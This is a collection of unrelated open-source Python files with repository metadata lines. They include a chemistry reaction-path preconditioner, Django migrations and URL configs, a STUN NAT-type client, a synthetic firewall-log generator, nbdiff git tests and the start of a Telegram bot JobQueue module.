print(f"{name}: {geom}\n\n{geom.as_xyz()}\n")
def get_frag_atoms(geom, frag):
atoms = geom.atoms
return [atoms[i] for i in frag]
for name, geom, frags in (("reactant", rgeom, rfrags), ("product", pgeom, pfrags)):
print(f"{len(frags)} Fragment(s) in {name} image:\n")
for frag in frags:
frag_atoms = get_frag_atoms(geom, frag)
frag_coords = geom.coords3d[list(frag)]
frag_xyz = make_xyz_str(frag_atoms, frag_coords * BOHR2ANG)
print(frag_xyz + "\n")
def print_bonds(geom, bonds):
for from_, to_ in bonds:
from_atom, to_atom = [geom.atoms[i] for i in (from_, to_)]
print(f"\t({from_: >3d}{from_atom} - {to_: >3d}{to_atom})")
print("Bonds broken in reactant image:")
print_bonds(rgeom, rbond_diff)
print()
print("Bonds formed in product image:")
print_bonds(pgeom, pbond_diff)
print()
def report_mats(name, mats):
for (m, n), indices in mats.items():
print(f"{name}({m}, {n}): {indices}")
print()
def center_fragments(frag_list, geom):
c3d = geom.coords3d
for frag in frag_list:
mean = c3d[frag].mean(axis=0)
c3d[frag] -= mean[None, :]
def get_which_frag(frags):
which_frag = dict()
for frag_ind, frag in enumerate(frags):
which_frag.update({atom_ind: frag_ind for atom_ind in frag})
return which_frag
def form_A(frags, which_frag, formed_bonds):
"""Construct the A-matrices.
AR[(m, n)] (AP[(m, n)]) contains the subset of atoms in Rm (Pm) that forms
bonds with Rn (Pn).
"""
A = dict()
for m, n in formed_bonds:
key = (which_frag[m], which_frag[n])
A.setdefault(key, list()).append(m)
A.setdefault(key[::-1], list()).append(n)
return A
CONFIG = {
"s2_hs_kappa": 1.0,
"s4_hs_kappa": 50.0,
"s4_v_kappa": 1.0,
"s4_w_kappa": 1.0,
"s5_v_kappa": 1.0,
"s5_w_kappa": 3.0,
"s5_hs_kappa": 10.0,
"s5_z_kappa": 2.0,
"s5_trans": True,
"s5_rms_force": 0.01,
}
def precon_pos_rot(reactants, products, prefix=None, config=CONFIG):
c = config
if prefix is None:
prefix = ""
def make_fn(fn):
return prefix + fn
rfrags, rfrag_bonds, rbonds, runion = get_fragments_and_bonds(reactants)
pfrags, pfrag_bonds, pbonds, punion = get_fragments_and_bonds(products)
pbond_diff = pbonds - rbonds # Present in product(s)
rbond_diff = rbonds - pbonds # Present in reactant(s)
involved_atoms = set(tuple(it.chain(*pbond_diff)))
involved_atoms |= set(tuple(it.chain(*rbond_diff)))
which_rfrag = get_which_frag(rfrags)
which_pfrag = get_which_frag(pfrags)
rfrag_lists = [list(frag) for frag in rfrags]
pfrag_lists = [list(frag) for frag in pfrags]
report_frags(runion, punion, rfrags, pfrags, rbond_diff, pbond_diff)
def form_C(m_frags, n_frags):
"""Construct the C-matrices.
Returns a dict with (m, n) keys, containing the respective
unions of rectant fragment n and product fragment m.
"""
C = dict()
for m, m_frag in enumerate(m_frags):
for n, n_frag in enumerate(n_frags):
C[(m, n)] = list(m_frag & n_frag)
return C
CR = form_C(rfrags, pfrags)
assert len(set(it.chain(*CR.values()))) == len(runion.atoms)
CP = {(n, m): union for (m, n), union in CR.items()}
print("CR(m, n), subset of atoms in molecule Rn which are in Pm after reaction.")
report_mats("CR", CR)
print("CP(m, n), subset of atoms in molecule Pn which are in Rm before reaction.")
report_mats("CP", CP)
def form_B(C):
"""Construct the B-matrices.
Returns a dict with (m, n) keys, containing the respective
subsets of C[(m, n)] that acutally participate in bond-breaking/forming.
"""
B = dict()
for (m, n), union in C.items():
key = (m, n)
B.setdefault(key, set())
B[key] |= set(union) & involved_atoms
for k, v in B.items():
B[k] = list(v)
return B
BR = form_B(CR)
BP = form_B(CP)
print(
"BR(m, n), subset of atoms in CRnm actually involved in bond forming/breaking."
)
report_mats("BR", BR)
print(
"BP(m, n), subset of atoms in CPnm actually involved in bond forming/breaking."
)
report_mats("BP", BP)
AR = form_A(rfrags, which_rfrag, pbond_diff)
AP = form_A(pfrags, which_pfrag, rbond_diff)
print("AR(m, n), subset of atoms in Rm that form bonds to atoms in Rn.")
report_mats("AR", AR)
print(
"AP(m, n), subset of atoms in Pm which had bonds with Pn (formerly bonded in R)."
)
report_mats("AP", AP)
def form_G(A):
G = dict()
for (m, n), inds in A.items():
G.setdefault(m, set())
G[m] |= set(inds)
for k, v in G.items():
G[k] = list(v)
assert len(v) > 0
return G
GR = form_G(AR)
# GP = form_G(AP)
print(f"GR: {GR}")
# print(f"GP: {GP}")
# Initial, centered, coordinates and 5 stages
r_coords = np.zeros((6, runion.coords.size))
p_coords = np.zeros((6, punion.coords.size))
def backup_coords(stage):
assert 0 <= stage < 6
r_coords[stage] = runion.coords.copy()
p_coords[stage] = punion.coords.copy()
"""
STAGE 1
Initial positioning of reactant and product molecules
"""
# Center fragments at their geometric average
center_fragments(rfrag_lists, runion)
center_fragments(pfrag_lists, punion)
backup_coords(0)
# Translate reactant molecules
alphas = get_steps_to_active_atom_mean(
rfrag_lists, rfrag_lists, AR, runion.coords3d
)
for rfrag, alpha in zip(rfrag_lists, alphas):
runion.coords3d[rfrag] += alpha
# Translate product molecules
betas = get_steps_to_active_atom_mean(
pfrag_lists, rfrag_lists, BR, punion.coords3d, skip=False
)
sigmas = get_steps_to_active_atom_mean(
pfrag_lists, rfrag_lists, CR, punion.coords3d, skip=False
)
bs_half = (betas + sigmas) / 2
for pfrag, bsh in zip(pfrag_lists, bs_half):
punion.coords3d[pfrag] += bsh
backup_coords(1)
print()
"""
STAGE 2
Intra-image Inter-molecular Hard-Sphere forces
"""
print(highlight_text("Stage 2, Hard-Sphere Forces"))
s2_hs_kappa = c["s2_hs_kappa"]
def hardsphere_sd_opt(geom, frag_lists, title):
print(highlight_text(title, level=1))
calc = HardSphere(geom, frag_lists, kappa=s2_hs_kappa)
geom.set_calculator(calc)
opt_kwargs = {
"max_cycles": 1000,
"max_step": 0.5,
"rms_force": 0.05,
}
opt = SteepestDescent(geom, **opt_kwargs)
opt.run()
hardsphere_sd_opt(runion, rfrag_lists, "Reactants")
hardsphere_sd_opt(punion, pfrag_lists, "Products")
backup_coords(2)
print()
"""
STAGE 3
Initial orientation of molecules
"""
print(highlight_text("Stage 3, Initial Orientation"))
# Rotate R fragments
if len(rfrag_lists) > 1:
alphas = get_steps_to_active_atom_mean(
rfrag_lists, rfrag_lists, AR, runion.coords3d
)
gammas = np.zeros_like(alphas)
for m, rfrag in enumerate(rfrag_lists):
Gm = GR[m]
gammas[m] = runion.coords3d[Gm].mean(axis=0)
r_means = np.array([runion.coords3d[frag].mean(axis=0) for frag in rfrag_lists])
for m, rfrag in enumerate(rfrag_lists):
gm = r_means[m]
rot_mat = get_rot_mat(gammas[m] - gm, alphas[m] - gm)
rot_coords = (runion.coords3d[rfrag] - gm).dot(rot_mat)
runion.coords3d[rfrag] = rot_coords + gm - rot_coords.mean(axis=0)
Ns = [0] * len(pfrag_lists)
for (m, n), CPmn in CP.items():
Ns[m] += len(CPmn)
# Rotate P fragments
for m, pfrag in enumerate(pfrag_lists):
pc3d = punion.coords3d[pfrag]
gm = pc3d.mean(axis=0)
r0Pm = pc3d - gm[None, :]
mu_Pm = np.zeros_like(r0Pm)
N = Ns[m]
for n, rfrag in enumerate(rfrag_lists):
# Skip rotation of 1-atom fragments
if len(rfrag) == 1:
continue
CPmn = CP[(m, n)]
RPmRn = get_rot_mat(
punion.coords3d[CPmn], runion.coords3d[CPmn], center=True
)
print(f"m={m}, n={n}, len(CPmn)={len(CPmn)}")
# Eq. (A2) in [1]
r0Pmn = np.einsum("ij,jk->ki", RPmRn, r0Pm.T)
mu_Pm += len(CPmn) ** 2 / N * r0Pmn
rot_mat = get_rot_mat(r0Pm, mu_Pm, center=True)
rot_coords = r0Pm.dot(rot_mat)
punion.coords3d[pfrag] = rot_coords + gm - rot_coords.mean(axis=0)
backup_coords(3)
print()
"""
STAGE 4
Alignment of reactive atoms
This stage involves three forces: hard-sphere forces and two kinds
of average translational (^t) and rotational (^r) forces (v and w,
(A3) - (A5) in [1]).
v^t and v^r arise from atoms in A^Rnm and A^Rmn, that is atoms that
participate in bond forming/breaking in R. The translational force
is usually attractive, which is counteracted by the repulsive hard-sphere
forces.
"""
print(highlight_text("Stage 4, Alignment Of Reactive Atoms"))
def composite_sd_opt(geom, keys_calcs, title, rms_force=0.05):
print(highlight_text(title, level=1))
final = " + ".join([k for k in keys_calcs.keys()])
calc = Composite(final, keys_calcs=keys_calcs)
geom.set_calculator(calc)
opt_kwargs = {
"max_step": 0.05,
"max_cycles": 2000,
"rms_force": rms_force,
}
opt = SteepestDescent(geom, **opt_kwargs)
opt.run()
def get_vr_trans_torque(kappa=1.0, do_trans=True):
return TransTorque(
rfrag_lists, rfrag_lists, AR, AR, kappa=kappa, do_trans=do_trans
)
def r_weight_func(m, n, a, b):
"""As required for (A5) in [1]."""
return 1 if a in BR[(m, n)] else 0.5
def get_wr_trans_torque(kappa=1.0, do_trans=True):
return TransTorque(
rfrag_lists,
pfrag_lists,
CR,
CP,
weight_func=r_weight_func,
skip=False,
b_coords3d=punion.coords3d,
kappa=kappa,
do_trans=do_trans,
)
def get_vp_trans_torque(kappa=1.0, do_trans=True):
return TransTorque(
pfrag_lists, pfrag_lists, AP, AP, kappa=kappa, do_trans=do_trans
)
def p_weight_func(m, n, a, b):
"""As required for (A5) in [1]."""
return 1 if a in BP[(m, n)] else 0.5
def get_wp_trans_torque(kappa=1.0, do_trans=True):
return TransTorque(
pfrag_lists,
rfrag_lists,
CP,
CR,
weight_func=p_weight_func,
skip=False,
b_coords3d=runion.coords3d,
kappa=kappa,
do_trans=do_trans,
)
s4_hs_kappa = c["s4_hs_kappa"]
s4_v_kappa = c["s4_v_kappa"]
s4_w_kappa = c["s4_w_kappa"]
vr_trans_torque = get_vr_trans_torque(kappa=s4_v_kappa)
wr_trans_torque = get_wr_trans_torque(kappa=s4_w_kappa)
r_keys_calcs = {
"hardsphere": HardSphere(runion, rfrag_lists, kappa=s4_hs_kappa),
"v": vr_trans_torque,
"w": wr_trans_torque,
}
composite_sd_opt(runion, r_keys_calcs, "Reactants")
vp_trans_torque = get_vp_trans_torque(kappa=s4_v_kappa)
wp_trans_torque = get_wp_trans_torque(kappa=s4_w_kappa)
p_keys_calcs = {
"hardsphere": HardSphere(punion, pfrag_lists, kappa=s4_hs_kappa),
"v": vp_trans_torque,
"w": wp_trans_torque,
}
composite_sd_opt(punion, p_keys_calcs, "Products")
backup_coords(4)
print()
"""
STAGE 5
Refinement of atomic positions using further hard-sphere forces.
"""
print(highlight_text("Stage 5, Refinement"))
s5_v_kappa = c["s5_v_kappa"]
s5_w_kappa = c["s5_w_kappa"]
s5_hs_kappa = c["s5_hs_kappa"]
s5_z_kappa = c["s5_z_kappa"]
s5_trans = c["s5_trans"]
s5_rms_force = c["s5_rms_force"]
vr_trans_torque = get_vr_trans_torque(kappa=s5_v_kappa, do_trans=s5_trans)
wr_trans_torque = get_wr_trans_torque(kappa=s5_w_kappa, do_trans=s5_trans)
zr_aa_trans_torque = AtomAtomTransTorque(runion, rfrag_lists, AR, kappa=s5_z_kappa)
r_keys_calcs = {
"v": vr_trans_torque,
"w": wr_trans_torque,
"hardsphere": HardSphere(runion, rfrag_lists, kappa=s5_hs_kappa),
"z": zr_aa_trans_torque,
}
composite_sd_opt(runion, r_keys_calcs, "Reactants", rms_force=s5_rms_force)
vp_trans_torque = get_vp_trans_torque(kappa=s5_v_kappa, do_trans=s5_trans)
wp_trans_torque = get_wp_trans_torque(kappa=s5_w_kappa, do_trans=s5_trans)
zp_aa_trans_torque = AtomAtomTransTorque(punion, pfrag_lists, AP, kappa=s5_z_kappa)
p_keys_calcs = {
"v": vp_trans_torque,
"w": wp_trans_torque,
"hardsphere": HardSphere(punion, pfrag_lists, kappa=s5_hs_kappa),
"z": zp_aa_trans_torque,
}
composite_sd_opt(punion, p_keys_calcs, "Products", rms_force=s5_rms_force)
backup_coords(5)
print()
with open(make_fn("s5.trj"), "w") as handle:
handle.write("\n".join([geom.as_xyz() for geom in (runion, punion)]))
def dump_stages(fn, atoms, coords_list):
align_coords(coords_list)
comments = [f"Stage {i}" for i in range(coords_list.shape[0])]
fn = make_fn(fn)
coords_to_trj(fn, atoms, coords_list, comments=comments)
dump_stages("r_coords.trj", runion.atoms, r_coords)
dump_stages("p_coords.trj", punion.atoms, p_coords)
runion.set_calculator(None)
punion.set_calculator(None)
return runion, punion
def run_precontr(reactant_geom, product_geom, **kwargs):
print(
highlight_text("Preconditioning of Translation & Rotation")
+ "\n\nPlease cite https://doi.org/10.1002/jcc.26495\n"
)
return precon_pos_rot(reactant_geom, product_geom, **kwargs)
| eljost/pysisyphus | pysisyphus/drivers/precon_pos_rot.py | Python | gpl-3.0 | 19,597 | 0.000714 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('broadcasts', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='broadcast',
name='series',
field=models.ForeignKey(related_name=b'broadcasts', blank=True, to='broadcasts.Series', null=True),
),
migrations.AlterField(
model_name='broadcast',
name='status',
field=models.CharField(max_length=200, blank=True),
),
]
| bryanveloso/avalonstar-tv | apps/broadcasts/migrations/0002_auto_20140927_0415.py | Python | apache-2.0 | 627 | 0.001595 |
"""
WSGI config for tiendalibros project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tiendalibros.settings")
application = get_wsgi_application()
| secnot/tutorial-tienda-django-paypal-1 | tiendalibros/tiendalibros/wsgi.py | Python | gpl-3.0 | 401 | 0 |
# Inviwo Python script
import inviwo
import math
import time
start = time.clock()
scale = 1;
d = 15
steps = 120
for i in range(0, steps):
r = (2 * 3.14 * i) / steps
x = d*math.sin(r)
z = -d*math.cos(r)
inviwo.setPropertyValue("EntryExitPoints.camera",((x*scale,3*scale,z*scale),(0,0,0),(0,1,0)))
for i in range(0, steps):
r = (2 * 3.14 * i) / (steps)
x = 1.0*math.sin(r)
z = 1.0*math.cos(r)
inviwo.setCameraUp("EntryExitPoints.camera",(x*scale,z*scale,0))
end = time.clock()
fps = 2*steps / (end - start)
fps = round(fps,3)
print("Frames per second: " + str(fps))
print("Time per frame: " + str(round(1000/fps,1)) + " ms") | sarbi127/inviwo | data/scripts/camerarotation.py | Python | bsd-2-clause | 687 | 0.040757 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for experiment utils."""
import numpy as np
import os
import tempfile
import tensorflow as tf
import experiment_utils
class AsymmetricSaverTest(tf.test.TestCase):
"""Tests for asymmetric saver."""
def test_save_restore(self):
x = tf.get_variable('x', [])
y = tf.get_variable('y', [])
x_dir = tempfile.mkdtemp()
y_dir = tempfile.mkdtemp()
x_checkpoint_base = os.path.join(x_dir, 'model.ckpt')
y_checkpoint_base = os.path.join(y_dir, 'model.ckpt')
normal_saver = tf.train.Saver([x, y])
# Save a checkpoint into y_dir first.
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
normal_saver.save(sess, y_checkpoint_base, global_step=0)
saver = experiment_utils.AsymmetricSaver(
[x], [experiment_utils.RestoreSpec(
[y], os.path.join(y_dir, 'model.ckpt-0'))])
# Write an x checkpoint.
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
x_initial, y_initial = sess.run([x, y])
saver.save(sess, x_checkpoint_base)
# Load using AsymmetricSaver.
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
saver.restore(sess, tf.train.latest_checkpoint(x_dir))
x_final, y_final = sess.run([x, y])
# Make sure that x is loaded correctly from checkpoint, and that y
# isn't.
self.assertEqual(x_initial, x_final)
self.assertNotAllClose(y_initial, y_final)
class FilterNormalizationTest(tf.test.TestCase):
def test_basic(self):
u = tf.get_variable('abcdef/weights', shape=[7, 5, 3, 2])
v = tf.get_variable('abcdef/biases', shape=[2])
w = tf.get_variable('unpaired/weights', shape=[7, 5, 3, 2])
x = tf.get_variable('untouched', shape=[])
normalize_ops = experiment_utils.normalize_all_filters(
tf.trainable_variables())
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
u_initial, v_initial, w_initial, x_initial = sess.run([u, v, w, x])
sess.run(normalize_ops)
u_final, v_final, w_final, x_final = sess.run([u, v, w, x])
u_norms = np.sqrt(np.sum(np.square(u_initial), axis=(0, 1, 2)))
w_norms = np.sqrt(np.sum(np.square(w_initial), axis=(0, 1, 2)))
# We expect that the abcdef weights are normalized in pairs, that
# the unpaired weights are normalized on their own, and the
# untouched weights are in fact untouched.
self.assertAllClose(np.array(u_final * u_norms), u_initial)
self.assertAllClose(np.array(v_final * u_norms), v_initial)
self.assertAllClose(np.array(w_final * w_norms), w_initial)
self.assertAllClose(x_initial, x_final)
class AssignmentHelperTest(tf.test.TestCase):
def test_basic(self):
x = tf.get_variable('x', shape=[2, 3])
y = tf.get_variable('y', shape=[4])
tf.get_variable('z', shape=[5, 6])
helper = experiment_utils.AssignmentHelper([x, y])
with self.test_session() as sess:
helper.assign(np.arange(10.0), sess)
self.assertAllClose(sess.run(x),
[[0.0, 1.0, 2.0], [3.0, 4.0, 5.0]])
self.assertAllClose(sess.run(y), [6.0, 7.0, 8.0, 9.0])
self.assertAllClose(
helper.retrieve(sess),
[0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0])
if __name__ == '__main__':
tf.test.main()
| google/spectral-density | tf/experiment_utils_test.py | Python | apache-2.0 | 3,931 | 0.005342 |
#!/usr/bin/python
'''
This script is used to generate a set of random-ish events to
simulate log data from a Juniper Netscreen FW. It was built
around using netcat to feed data into Flume for ingestion
into a Hadoop cluster.
Once you have Flume configured you would use the following
command to populate data:
./gen_events.py 2>&1 | nc 127.0.0.1 9999
'''
import random
from netaddr import *
from time import sleep
protocols = ['6', '17']
common_ports = ['20','21','22','23','25','80','109','110','119','143','156','161','389','443']
action_list = ['Deny', 'Accept', 'Drop', 'Reject'];
src_network = IPNetwork('192.168.1.0/24')
dest_network = IPNetwork('172.35.0.0/16')
fo = open("replay_log.txt", "w")
while (1 == 1):
proto_index = random.randint(0,1)
protocol = protocols[proto_index]
src_port_index = random.randint(0,13)
dest_port_index = random.randint(0,13)
src_port = common_ports[src_port_index]
dest_port = common_ports[dest_port_index]
action_index = random.randint(0,3)
action = action_list[action_index]
src_ip_index = random.randint(1,254)
src_ip = src_network[src_ip_index]
dest_ip_index = random.randint(1,65535)
dest_ip = dest_network[dest_ip_index]
event = "192.168.1.3 Netscreen-FW1: NetScreen device_id=Netscreen-FW1 [Root]system-notification-00257(traffic): start_time=\"YYYY-MM-DD HH:MM:SS\" duration=0 policy_id=125 service=syslog proto=%s src zone=Untrust dst zone=Trust action=%s sent=0 rcvd=0 src=%s dst=%s src_port=%s dst_port=%s session_id=0" % (protocol, action, src_ip, dest_ip, src_port, dest_port)
fo.write(event + "\n")
print event
sleep(0.3)
fo.close()
| jpacerqueira/jpac-flume-logs | generator/gen_events.py | Python | apache-2.0 | 1,662 | 0.015042 |
import struct, socket, time, logging
from gosh.config import STUN_SERVER, STUN_PORT, logger
from gosh import JsonSocket
#=============================================================================
# STUN Client
# ============================================================================
class StunClient(object):
## defined protocol
TCP='TCP'
UDP='UDP'
def __init__(self, pro):
self.tcp=False
if pro == 'TCP':
self.tcp = True
self.port = None
else:
self.sock = None
def NAT_Behavior_Discovery(self):
mapping = self.mapping_behavior()
if self.tcp:
self.port = None
elif self.sock:
self.sock.close()
self.sock = None
if self.tcp:
filtering = 0
else:
filtering = self.filtering_behavior()
if self.sock:
self.sock.close()
self.sock = None
return mapping, filtering
def CreateMessage(self, changeip=False, changeport=False):
""" create message binding request"""
data = {}
data["STUN-TYPE"] = 'BINDING_REQUEST'
data["CHANGE-REQUEST"] = 'CHANGE-REQUEST'
data["CHANGE-IP"] = changeip
data["CHANGE-PORT"] = changeport
return data
def binding_request(self, server, port, request, mapping=False):
""" check nat type """
udpconnect = False
if self.tcp:
self.sock = JsonSocket(JsonSocket.TCP)
self.sock.set_reuseaddr()
if self.port:
self.sock.bind(self.port)
logger.debug("binding_request: Bind on port %d" %self.port)
else:
self.port = self.sock.bind(0)
else:
if not self.sock:
self.sock = JsonSocket(JsonSocket.UDP)
if mapping:
udpconnect = True
self.sock.set_timeout(3)
if self.sock.connect(server, port, udpconnect):
self.sock.send_obj(request)
try:
data = self.sock.read_obj()
except Exception, e:
logger.debug("binding_request: %s" %e)
return False
self.local_addr = self.sock.getsockname()
logger.debug("binding_request: Local address %s:%d" %self.local_addr)
if self.tcp:
self.sock.close()
else:
self.sock.set_timeout(None)
if 'BINDING-RESPONSE' in data:
return False
return data
return False
def mapping_behavior(self):
""" mapping behavior testing nat """
message = self.CreateMessage()
data = self.binding_request(STUN_SERVER, STUN_PORT, message, True)
if not data:
return False
#=============================================
# TEST I
# ============================================
logger.debug("mapping_behavior: TEST_I")
LOCAL_ADDR = "%s:%d" % self.local_addr
TEST_I = data['XOR-MAPPED-ADDRESS']
logger.debug("mapping_behavior: Public IP %s"%TEST_I)
OTHER_SERVER, OTHER_PORT = data['OTHER-ADDRESS'].split(":")
if LOCAL_ADDR == TEST_I:
return 10
else:
#=============================================
# TEST II
# ============================================
logger.debug("mapping_behavior: TEST_II")
message = self.CreateMessage()
data = self.binding_request(OTHER_SERVER, STUN_PORT, message, True)
if not data:
return False
TEST_II = data['XOR-MAPPED-ADDRESS']
logger.debug("mapping_behavior: Public IP %s"%TEST_II)
if TEST_I == TEST_II:
return 1
else:
#=============================================
# TEST III
# ============================================
logger.debug("mapping_behavior: TEST_III")
message = self.CreateMessage()
data = self.binding_request(OTHER_SERVER, int(OTHER_PORT), message, True)
if not data:
return False
TEST_III = data['XOR-MAPPED-ADDRESS']
logger.debug("mapping_behavior: Public IP %s"%TEST_III)
if TEST_II == TEST_III:
return 2
else:
if self.tcp:
port1 = int(TEST_I.split(":")[1])
port2 = int(TEST_II.split(":")[1])
port3 = int(TEST_III.split(":")[1])
if abs(port2-port1) < 5 and abs(port3-port1) <5:
if port1 < port2 < port3:
return 4
elif port1 > port2 > port3:
return 5
return 3
def filtering_behavior(self):
""" filtering behavior testing nat """
#=============================================
# TEST I
# ============================================
logger.debug("filtering_behavior: TEST_I")
message = self.CreateMessage()
data = self.binding_request(STUN_SERVER, STUN_PORT, message)
if not data:
return False
#=============================================
# TEST II
# ============================================
logger.debug("filtering_behavior: TEST_II")
message = self.CreateMessage(changeip=True, changeport=True)
data = self.binding_request(STUN_SERVER, STUN_PORT, message)
if data:
return 1
else:
logger.debug("filtering_behavior: TEST_III")
#=============================================
# TEST III
# ============================================
message = self.CreateMessage(changeip=False, changeport=True)
data = self.binding_request(STUN_SERVER, STUN_PORT, message)
if data:
return 2
else:
return 3
| nthiep/global-ssh | gosh/stun.py | Python | agpl-3.0 | 4,914 | 0.037241 |
from django.conf.urls.defaults import *
from models import Entry, Tag
from django.views.generic.dates import ArchiveIndexView, DateDetailView
from django.views.generic import TemplateView
urlpatterns = patterns('',
url(r'^/?$', ArchiveIndexView.as_view(model=Entry, date_field="published_on"), name="news-main"),
# url(r'^(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<slug>[0-9A-Za-z-]+)/$', 'date_based.object_detail', dict(entry_dict, slug_field='slug', month_format='%m'),name="news-detail"),
url(r'^(?P<year>\d+)/(?P<month>[-\w]+)/(?P<day>\d+)/(?P<pk>\d+)/$',
DateDetailView.as_view(model=Entry, date_field="published_on"),
name="news_detail"),
url(r'^about/$', TemplateView.as_view(template_name='news/about.html'), name='news-about'),
)
| underbluewaters/marinemap | lingcod/news/urls.py | Python | bsd-3-clause | 788 | 0.006345 |
from collections import OrderedDict
n = int(input())
occurrences = OrderedDict()
for _ in range(0, n):
word = input().strip()
occurrences[word] = occurrences.get(word, 0) + 1
print(len(occurrences))
print(sep=' ', *[count for _, count in occurrences.items()])
| alexander-matsievsky/HackerRank | All_Domains/Python/Collections/word-order.py | Python | mit | 269 | 0 |
from nbdiff.adapter import git_adapter as g
from pretend import stub
def test_get_modified_notebooks_empty():
g.subprocess = stub(check_output=lambda cmd: 'true\n'
if '--is-inside-work-tree' in cmd
else '')
adapter = g.GitAdapter()
result = adapter.get_modified_notebooks()
assert result == []
def test_get_modified_notebooks_deleted():
adapter = g.GitAdapter()
def check_output_stub(cmd):
if '--modified' in cmd:
output = '''foo.ipynb
bar.ipynb
foo.txt
baz.ipynb
'''
return output
elif '--unmerged' in cmd:
return ''.join([
'100755\thash\t{i}\tfoo.ipynb\n'
for i in [1, 2, 3]
])
elif '--is-inside-work-tree' in cmd:
return 'true\n'
elif '--show-toplevel' in cmd:
return '/home/user/Documents'
def popen(*args, **kwargs):
return stub(stdout=stub(read=lambda: ""))
g.open = lambda fname: stub(read=lambda: "")
g.subprocess = stub(
check_output=check_output_stub,
PIPE='foo',
Popen=popen,
)
g.os.path.exists = lambda path: 'bar.ipynb' in path
result = adapter.get_modified_notebooks()
assert result[0][2] == 'bar.ipynb'
assert len(result) == 1
def test_get_modified_notebooks():
adapter = g.GitAdapter()
def check_output_stub(cmd):
if '--modified' in cmd:
output = '''foo.ipynb
bar.ipynb
foo.txt
baz.ipynb
'''
return output
elif '--unmerged' in cmd:
return ''.join([
'100755\thash\t{i}\tfoo.ipynb\n'
for i in [1, 2, 3]
])
elif '--is-inside-work-tree' in cmd:
return 'true\n'
elif '--show-toplevel' in cmd:
return '/home/user/Documents'
def popen(*args, **kwargs):
return stub(stdout=stub(read=lambda: ""))
g.open = lambda fname: stub(read=lambda: "")
g.subprocess = stub(
check_output=check_output_stub,
PIPE='foo',
Popen=popen,
)
g.os.path.exists = lambda path: True
result = adapter.get_modified_notebooks()
assert result[0][2] == 'bar.ipynb'
assert result[1][2] == 'baz.ipynb'
assert len(result) == 2
def test_get_unmerged_notebooks_empty():
g.subprocess = stub(check_output=lambda cmd: 'true\n'
if '--is-inside-work-tree' in cmd
else '')
adapter = g.GitAdapter()
result = adapter.get_unmerged_notebooks()
assert result == []
def test_get_unmerged_notebooks():
adapter = g.GitAdapter()
def check_output_stub(cmd):
if '--unmerged' in cmd:
f1 = ''.join([
'100755\thash\t{i}\tfoo.ipynb\n'
for i in [1, 2, 3]
])
f2 = ''.join([
'100755\thash\t{i}\tbar.ipynb\n'
for i in [1, 2, 3]
])
f3 = ''.join([
'100755\thash\t{i}\tfoo.py\n'
for i in [1, 2, 3]
])
return f1 + f2 + f3
elif '--is-inside-work-tree' in cmd:
return 'true\n'
elif '--show-toplevel' in cmd:
return '/home/user/Documents'
def popen(*args, **kwargs):
return stub(stdout=stub(read=lambda: ""))
g.open = lambda fname: stub(read=lambda: "")
g.subprocess = stub(
check_output=check_output_stub,
PIPE='foo',
Popen=popen,
)
result = adapter.get_unmerged_notebooks()
assert len(result) == 2
assert result[0][3] == '/home/user/Documents/foo.ipynb'
assert result[1][3] == '/home/user/Documents/bar.ipynb'
| tarmstrong/nbdiff | tests/test_git_adapter.py | Python | mit | 3,720 | 0 |
#!/usr/bin/env python
# flake8: noqa E501
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the classes JobQueue and Job."""
import logging
import time
import warnings
import datetime
import weakref
from numbers import Number
from threading import Thread, Lock, Event
from queue import PriorityQueue, Empty
class Days(object):
MON, TUE, WED, THU, FRI, SAT, SUN = range(7)
EVERY_DAY = tuple(range(7))
class JobQueue(object):
"""This class allows you to periodically perform tasks with the bot.
Attributes:
queue (:obj:`PriorityQueue`): The queue that holds the Jobs.
bot (:class:`telegram.Bot`): Bot that's send to the handlers.
Args:
bot (:class:`telegram.Bot`): The bot instance that should be passed to the jobs.
Deprecated:
prevent_autostart (:obj:`bool`, optional): Thread does not start during initialisation.
Use `start` method instead.
"""
def __init__(self, bot, prevent_autostart=None):
if prevent_autostart is not None:
warnings.warn("prevent_autostart is being deprecated, use `start` method instead.")
self.queue = PriorityQueue()
self.bot = bot
self.logger = logging.getLogger(self.__class__.__name__)
self.__start_lock = Lock()
self.__next_peek_lock = Lock() # to protect self._next_peek & self.__tick
self.__tick = Event()
self.__thread = None
self._next_peek = None
self._running = False
def put(self, job, next_t=None):
"""Queue a new job.
Note:
This method is deprecated. Please use: :attr:`run_once`, :attr:`run_daily`
or :attr:`run_repeating` instead.
Args:
job (:class:`telegram.ext.Job`): The ``Job`` instance representing the new job.
next_t (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`, optional):
Time in or at which the job should run for the first time. This parameter will
be interpreted depending on its type.
* :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the
job should run.
* :obj:`datetime.timedelta` will be interpreted as "time from now" in which the
job should run.
* :obj:`datetime.datetime` will be interpreted as a specific date and time at
which the job should run.
